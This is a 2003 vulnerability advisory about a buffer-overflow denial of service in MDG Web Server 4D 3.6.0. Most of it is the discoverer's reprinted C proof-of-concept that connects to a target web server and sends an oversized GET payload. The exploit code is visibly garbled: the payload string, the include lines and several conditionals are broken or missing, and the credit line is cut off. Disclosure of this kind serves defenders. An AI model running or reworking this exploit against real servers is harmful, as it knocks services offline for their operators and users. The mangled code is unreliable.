Denial of Service (DoS) in MDG Web Server 4D Version 3.6.0

Reported April 30, 2003, by Tom Ferris.

VERSIONS AFFECTED

DESCRIPTION

A Denial of Service (DoS) vulnerability in MDG Web Server 4D 3.6.0 can result in the execution of arbitrary code on the vulnerable system. This vulnerability stems from a buffer-overflow condition. By issuing a GET / request with 4096 caret brackets (

DEMONSTRATION

The discoverer posted the following code as proof of concept:

/* Web Server 4D 3.6.0 DoS

 *

 * Vulnerable systems:

 * Web Server 4D 3.6.0 DoS

 * Vendor:

 * http://www.mdg.com/

 *

 * Download it here:

 * ftp://ftp.mdg.com/demos/WS4D/Win/WS4D_3.6.0_Full.exe

 *

 * Written and found by badpack3t

 * For SP Research Labs

 * 04/29/2003

 *

 * www.security-protocols.com

 *

 * usage:

 * sp-ws4d [targetport] (default is 80)

 */

#include

#include

#pragma comment(lib, "ws2_32.lib")

char exploit[] =

"GET /

"

"

"

"

"

"

int main(int argc, char *argv[])

{

      WSADATA wsaData;

      WORD wVersionRequested;

      struct hostent          *pTarget;

      struct sockaddr_in      sock;

      char *target, buffer[30000];

      int port,bufsize;

      SOCKET mysocket;

      if (argc

      {

            printf("Web Server 4D 3.6.0 DoSr rr", argv[0]);

            printf("Tool Usage:r %s [targetport] (default is 80)rr", argv[0]);

            printf("www.security-protocols.comrr", argv[0]);

            exit(1);

      }

      wVersionRequested = MAKEWORD(1, 1);

      if (WSAStartup(wVersionRequested, &wsaData)

      target = argv[1];

      //for default web attacks

      port = 80;

      if (argc >= 3) port = atoi(argv[2]);

      bufsize = 512;

      if (argc >= 4) bufsize = atoi(argv[3]);

      mysocket = socket(AF_INET, SOCK_STREAM, 0);

      if(mysocket

INVALID_SOCKET)

      {    

            printf("Socket error!r");

            exit(1);

      }

      printf("Resolving Hostnames...");

      if ((pTarget = gethostbyname(target)) NULL)

      {

            printf("Resolve of %s failed", argv[1]);

            exit(1);

      }

      memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);

      sock.sin_family = AF_INET;

      sock.sin_port = htons((USHORT)port);

      printf("Connecting...");

      if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))

      {

            printf("Couldn't connect to host.");

            exit(1);

      }

      printf("Connected!...");

      printf("Sending Payload...");

      if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)

      {

            printf("Error Sending the Exploit Payloadr");

            closesocket(mysocket);

            exit(1);

      }

      printf("Remote Webserver has been DoS'ed r");

      closesocket(mysocket);

      WSACleanup();

      return 0;

}

VENDOR RESPONSE

MDG has released version 3.6.1 of the product. The vendor reports that this version is no longer vulnerable.

CREDI

 

Discovered byTom Ferris.